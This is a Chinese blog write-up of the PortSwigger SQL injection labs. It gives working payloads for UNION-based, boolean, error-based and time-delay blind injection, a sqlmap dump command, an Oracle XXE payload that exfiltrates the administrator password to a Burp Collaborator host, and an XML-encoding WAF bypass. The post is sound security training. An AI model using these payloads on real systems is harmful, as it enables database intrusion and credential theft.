【PortSwigger】SQL注入实验全记录

已于 2023-05-12 14:10:49 修改
阅读量1.3k 收藏 12
点赞数 2
CC 4.0 BY-SA版权
分类专栏: web安全 文章标签: sql 数据库 oracle
于 2023-05-12 13:41:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leo788/article/details/130585190
本文详细介绍了SQL注入的各种类型和检测方法,包括使用单引号、特定SQL语法、布尔条件和时间延迟的测试。还探讨了不同上下文的注入,如UPDATE和INSERT语句中的注入,并提供了防止SQL注入的策略。此外,文章深入讲解了二阶SQL注入的概念,并通过实例展示了Oracle、MySQL数据库的查询技巧,以及盲注、时间延迟注入和带外数据泄露的利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Burp靶场-SQL注入LAB

简介

靶场地址

1.如何检测sql注入

可以通过对应用程序中的每个入口点使用一组系统的测试来手动检测 SQL 注入。这通常涉及:

  • 提交单引号字符并查找错误或其他异常。’
  • 提交一些特定于 SQL 的语法,该语法的计算结果为入口点的基(原始)值和不同的值,并查找生成的应用程序响应中的系统差异。
  • 提交布尔条件(如OR 1=1和OR 1=2),并查找应用程序响应中的差异。
  • 提交旨在触发在 SQL 查询中执行时的时间延迟的有效负载,并查找响应所花费时间的差异。
  • 提交旨在触发带外网络交互的 OAST 有效负载,以便在 SQL 查询中执行时触发带外网络交互,并监视任何生成的交互。

2.查询不同部分的sql注入

更新:UPDATE WHERE
插入:INSERT
表或列名:SELECT,SELECT ORDER BY

3.不同上下文的sql注入

不同的格式甚至可能为您提供其他方法来混淆由于 WAF 和其他防御机制而被阻止的攻击。弱实现通常只是在请求中查找常见的 SQL 注入关键字,因此您可以通过简单地编码或转义禁止关键字中的字符来绕过这些过滤器。
一些网站采用 JSON 或 XML 格式的输入,并使用它来查询数据库。这些不同的格式甚至可能为您提供其他方法来混淆由于 WAF 和其他防御机制而被阻止的攻击。

4.如何防止sql注入

5.二阶注入简介

一阶 SQL 注入出现在应用程序从 HTTP 请求获取用户输入并在处理该请求的过程中以不安全的方式将输入注入到 SQL 查询中的情况。
在二阶 SQL 注入(也称为存储的 SQL 注入)中,应用程序从 HTTP 请求中获取用户输入并将其存储以供将来使用。这通常是通过将输入放入数据库来完成的,但在存储数据的位置不会出现漏洞。稍后,在处理不同的 HTTP 请求时,应用程序会检索存储的数据,并以不安全的方式将其注入到 SQL 查询中。

0x03

在这里插入图片描述
在这里插入图片描述
使用order by 找到其有2或3列,所以union select的时候可以union select null,null,null--+
在这里插入图片描述

0x04 union 查找列

在这里插入图片描述

0x05 union 单个列中检索多个值

在这里插入图片描述
在这里插入图片描述
sqlmap payload:sqlmap.py -u "http://目标地址" -T users -C username,password --dump
直接掉库:
在这里插入图片描述
本来以为是加密密钥,用md5看了一下发现不是,就是密码
在这里插入图片描述

0x06

同理5
在这里插入图片描述

0x07 oracle查询数据库的类型和版本

在这里插入图片描述
要求回显:

Make the database retrieve the strings:
‘Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production, PL/SQL Release 11.2.0.2.0 - Production, CORE 11.2.0.2.0 Production, TNS for Linux: Version 11.2.0.2.0 - Production, NLSRTL Version 11.2.0.2.0 - Production’

在这里插入图片描述
oracle与mysql数据库是不一样的,查询语句如下:union select ‘null’,'null' from dual--+
先判断注入点及对应类型:
在这里插入图片描述
在这里插入图片描述
注入点在查询语句中,字符型
在这里插入图片描述
字符型union查询,成功回显
在这里插入图片描述
在这里插入图片描述
这里要用V$version表,不用dual表

0x08 MySQL和Microsoft上进行数据库类型和版本查询

在这里插入图片描述
查询结果:Make the database retrieve the string: ‘8.0.32-0ubuntu0.20.04.2’
在这里插入图片描述
mysql数据库的注入点测试不用区分类型,
在这里插入图片描述
在这里插入图片描述

0x09 非oracle数据库查询用户名密码

在这里插入图片描述
找和users相关的表名
在这里插入图片描述
在这里插入图片描述
得到用户名及密码:
administrator:i4ivwao1yqkh4gt00n17
在这里插入图片描述

0x10 Oracle结构查询用户名密码

在这里插入图片描述
首先查询table_name在all_tables中
在这里插入图片描述
然后查询USERS_的列名union select column_name,null from all_tab_columns where table_name='USERS_'--+

在这里插入图片描述
然后查询对应字段名:'union select PASSWORD_,USERNAME_ from USERS--+
在这里插入图片描述

0x11 使用条件响应的盲sql注入

在这里插入图片描述
由题干中的信息可知注入点应该在cookie中,同时注入类型是盲注,目的是在users表中找到username为administrator的password。
所以首先应该找回显,这里使用布尔型的盲注:
在这里插入图片描述
在这里插入图片描述
为真时,cookie有回显:Welcome back!

在这里插入图片描述
在这里插入图片描述
无回显。
布尔盲注:通过AND构造语句做判断
AND (SELECT 'a' FROM users LIMIT 1)='a查找是否有users表
AND (SELECT 'a' FROM users WHERE username=’administrator‘ )='a查找是否存在administrator用户
AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=$1$)='a
在这里插入图片描述
下一步是测试每个位置的字符以确定其值。这涉及更多的请求,因此您需要使用Burp Intruder。使用上下文菜单将您正在处理的请求发送给 Burp Intruder。
再判断每个位上的字符,就需要SUBSTRING()方法
AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator ')='a
使用该函数从密码中提取单个字符,并根据特定值对其进行测试。我们的攻击将循环遍历每个位置和可能的值,依次测试每个位置和可能的值。SUBSTRING()
在这里插入图片描述
’ AND (SELECT SUBSTRING(password,§1§,1) FROM users WHERE username=‘administrator’ )='§a§
爆破:字段从1-20,对应位置(0-9,a-z,A-Z)cluster bomb,同时设置Grep-Match:Welcome back!
在这里插入图片描述

得到所有match到welcome的各位置字符
aqn6kcoirm8dabdwidr0
在这里插入图片描述

0x12 具有条件错误的盲sql注入

在这里插入图片描述
首先来测试注入符号会不会引起报错
在这里插入图片描述
只添加一个引号,响应报错信息,提示:
在这里插入图片描述
添加两个单引号,达到闭合,成功显示
在这里插入图片描述
添加两个引号,验证错误消失,表明语法错误(在本例中为未闭合引号)对响应具有可检测的影响。
构造能产生正确回显的语句:' ||(SELECT '' FROM dual)||'
这里用OR就会报错,oracle数据库所以需要具体的数据库dual
在这里插入图片描述
验证语句:'||(SELECT CASE WHEN(1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||’
在这里插入图片描述
满足1=1条件就进行TO_CHAR(1/0)运算,被0除则会出错
不满足就执行后边语句,通过控制when中的条件来进行正确语句的执行,达到条件时则报错,用报错来判断。
在这里插入图片描述
通过修改条件做判断,如果条件为真则报错,盲注首先猜测长度
'|| (SELECT CASE WHEN length(password)>1 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator' ) ||'
有了验证条件就可以利用爆破来验证password的长度
在这里插入图片描述

在20这里条件报错,说明passwrd的长度为20,再猜测字符,对各个位置字段内容进行验证:
'||(SELECT CASE WHEN SUBSTR(password,$1$,1)='$b$' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

注意oracle用的SUBSTR()函数
在这里插入图片描述

在这里插入图片描述

对应password:xir3qqtefr1r39nb525s

0x13 具有时间延迟的盲sql注入

在这里插入图片描述
需要使用时间盲注的条件:无论注入正确或错误其返回页面都是相同的
通常使用sleep()函数对判断为真时进行延时
本题只需要延时,payload:’|| pg_sleep(10)--
在这里插入图片描述

0x14 具有时间延迟和信息检索的盲sql注入

在这里插入图片描述
利用时间延迟做判断,满足条件就延迟
首先测试延迟效果,这里不用||来连接语句,用%3B应该是一个语句叠加:
|| pg_sleep(10)--
%3BSELECT CASE WHEN(username='administrator' AND LENGTH(password)=$1$) THEN pg_sleep(10) ELSE pg_sleep(0) END from users--
在这里插入图片描述
响应包大小及响应时间,这里当length(=20)时最大,继续找对应位置的字符
%3BSELECT CASE WHEN(username='administrator' AND SUBSTRING(password,1,1)='a') THEN pg_sleep(10) ELSE pg_sleep(0) END from users--
这里需要点进每一个爆破后的返回包查看这里的响应时间,正常时间按范围在100-x00的范围,进行延时判断注入的时间在10000范围。
在这里插入图片描述
最后拼装上账户密码:vl3oio8qoas87kgisqg8

0x15 带外交互的盲sql注入

在这里插入图片描述
这里要执行和DNSlog有关的注入,这里要使用Burp的服务器,复制服务器地址
在这里插入图片描述
在这里插入图片描述
再将复制的网址粘贴到下边BURP-COLLABORATOR-SUBDOMAIN的位置

' SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual--
在这里插入图片描述
在这里插入图片描述
服务器接收到内容

0x16 带外数据泄露的盲sql注入

在这里插入图片描述
这里还是利用DNSlog来进行注入,构造语句从users库中得到administrator用户名的账号。
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.ld2w44xkoxukje9478ep5rz8szyrmg.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
在这里插入图片描述
在这里插入图片描述
这里带出账号密码

0x17 通过XML编码使用过滤器旁路的sql注入

在这里插入图片描述
库存检查功能中存在sql注入,所以观察页面找到库存管理,发现页面和之前多一个view detail点进去看到一个Check stock发现可以进行库存查询,进行抓包检查一下。
在这里插入图片描述
抓到的包发现时xml格式,修改数字参数可以返回对应的响应,存在注入点。
在这里插入图片描述
同时发现这两处都能进行注入,写入union select发现waf:
在这里插入图片描述

在这里插入图片描述
这里使用Hackvector插件进行编码,hackvector的安装:
在这里插入图片描述
选中union 。。。null右键hackvertor-encode-dec_entities,再对其进行响应,可以返回
在这里插入图片描述
在这里插入图片描述

SQL注入实验
xiongIT的博客
10-29 2990
SQL注入实验和站在防御者角度该怎么预防Sql注入
PortSwigger SQL injection(详细过程及解释,小白也可以看懂!)
2201_75445650的博客
04-26 1069
PortSwigger sql injection实验详细解释
portswigger靶场SQL注入实验(上)
m0_51313985的博客
09-09 3512
最近发现一个挺不错的靶场,burpsuite的官方网站在线训练平台 不多说先到第一个系列的实验去一探究竟 麻了,英文界面属实不太友好! 所以我决定用谷歌看题,火狐去操作(主要火狐用习惯了) 第一个系列的实验SQL注入,先来简单了解一下吧。 什么是SQL注入SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导
PortSwigger Cross-site scripting(xss实验详解,小白也可以看懂!!)
最新发布
2201_75445650的博客
05-03 1458
PortSwigger XSS实验详解(小白也可以看懂!)
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
weixin_60677557的博客
07-05 3198
SQL注入SQLi)是一种Web安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或者应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除此数据,从而导致应用程序的内容或行为发生持久更改。在某些情况下,攻击者可以升级SQL注入攻击以危及底层服务器或其他后端基础架构,或执行拒绝服务攻击。
portswiggerSQL注入实验室笔记
m0_69349614的博客
07-06 1411
实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。这种攻击的第一步是确定查询返回的列数。然后,您将在后续实验中使用此技术来构建完整的攻击。要解决该实验,请通过执行SQL 注入 UNION攻击来确定查询返回的列数,该攻击会返回包含空值的附加行。'+ORDER+BY+3--'+UNION+SELECT+NULL,NULL,NULL--该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因
portswigger靶场SQL注入实验(下)
m0_51313985的博客
10-03 2610
实验9 点击了home之后页面给了回显,猜测后面进行盲注的时候要利用此回显来判断,打开bp吧 注入点在trackingid这,简单判断一下 存在注入,下面判断一下是否存在表users,表里是否存在名为administrator的用户以及密码password有多少字符 为真,存在users表,接着查用户 后面判断password的长度 大于1为真,扩大点看看 大于30无回显,长度应该是小于30的,具体多少跑一下payload吧 选择number范围1-30 到20,在确定了密码的长度之
portswigger靶场学习笔记(一)sqli注入
weixin_52835927的博客
10-08 608
在本次靶场开始联系之前,已经学习了sqli-labs,pikachu,DVWA三个靶场,在学习portswigger的时候,我准备从较为熟悉的sqli注入部分开始。
PortSwigger NoSQL 注入
weixin_42451330的博客
01-16 934
NoSQL 是一种非关系型数据库,适用于存储非结构化或半结构化数据,具有高扩展性和灵活性,但缺乏强一致性和复杂事务支持。NoSQL 注入是攻击者通过操纵 NoSQL 查询语法(如 JSON、BSON)或 API 调用,绕过验证或窃取数据。常见攻击方式包括语法注入、运算符注入和 JavaScript 注入。防御措施包括输入验证、参数化查询、禁用危险功能、使用白名单、最小权限原则、ORM/ODM 工具、编码转义以及日志监控。通过这些方法,可以有效防止 NoSQL 注入,确保应用程序安全。
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 6179
BurpSuit官方实验室靶场-SQL注入通关记录。
二、SQL注入学习
qq_43387510的博客
01-28 391
2.1、SQL注入原理 SQL注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 在解释型语言中,如果程序与用户进行交互。用户就可以构造特殊的输入来拼接到程序中执行,从而使得程序依据用户输入执行有可能存在恶意行为的代码。 例如: 在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。登录案
sql注入攻击实验
05-25
sql注入攻击,先自己搭建一个网站,链接数据库必须用Sa链接
CTF 题集SQL整数型注入
01-13
- **PortSwigger Web Security Academy**:这是一个专注于web安全教育的学习网站,提供了详细的教程和互动实验室,涵盖了各种各样的SQL注入技巧,也包括了整数型注入案例研究。 ```bash # 使用sqlmap检测并利用整数...
SQL注入实验-- SQLi-Labs
m0_51427256的博客
11-19 1011
​1、安装phpstudy 1)下载:https://www.xp.cn/ 2)一键式安装:右下角自定义可以更改安装路径 3)打开apache和mysql
SQL注入测试实验
weixin_43488742的博客
03-04 6223
一、SQL注入漏洞 1、工具安装 phpstudy与DVWA安装配置(默认用户名:admin,默认密码:password) (1)软件安装教程:https://datutu.blog.csdn.net/article/details/109323067?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_paycol
简单SQL注入实验
qq_43518594的博客
10-30 3637
一、什么是SQL注入 SQL攻击(英语:SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 二、SQL注入原理 一般情况下,用户登录的SQL语句为select * from users where user=$username and pw=$password ;这里的username和password分别
Sql注入实验
Nocker888的博客
11-11 552
Sql注入实验Sql 注入 实验 一总结 青春一经典当即永不再赎 不怕自己笨,就怕那些比自己笨的人比自己还要努力 Sql 注入 实验 一 在得到靶机的情况下,寻找带有参数的地方就有一定有注入点。 开干,首先是判断注入点 payload如下: // 数字型判断 ?id=1 and 1=1 ?id=1 and 1=2 // 字符型判断 ?id=1' and...
portswigger SQL注入
02-04
### Portswigger SQL 注入教程及相关资源 Portswigger Web Security Academy 提供了详尽的 SQL 注入学习路径,帮助理解不同类型的攻击向量及其防御措施。平台上的课程设计旨在通过实践操作来掌握技能。 #### 学习路径概述 Web Security Academy 的 SQL 注入部分分为多个模块,涵盖了从基础到高级的主题[^1]: - **基础知识** - 解释什么是 SQL 注入以及它的工作原理。 - **实验室练习** - 用户可以在受控环境中尝试各种形式的注入技术,包括基于错误、布尔盲注等方法。 - **防护建议** - 教授如何利用参数化查询和其他最佳实践防止漏洞的发生。 #### 实际案例分析 为了加深理解,网站提供了真实的场景模拟,让学员能够识别并修复潜在的安全隐患。这些实例通常涉及常见的 web 应用程序功能,比如登录表单验证逻辑中的缺陷[^2]。 ```python # 不安全的做法 query = "SELECT * FROM users WHERE username='%s' AND password='%s'" % (username, password) # 安全做法:使用预编译语句/参数绑定 stmt = connection.prepareStatement("SELECT * FROM users WHERE username=? AND password=?") stmt.setString(1, username) stmt.setString(2, password) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值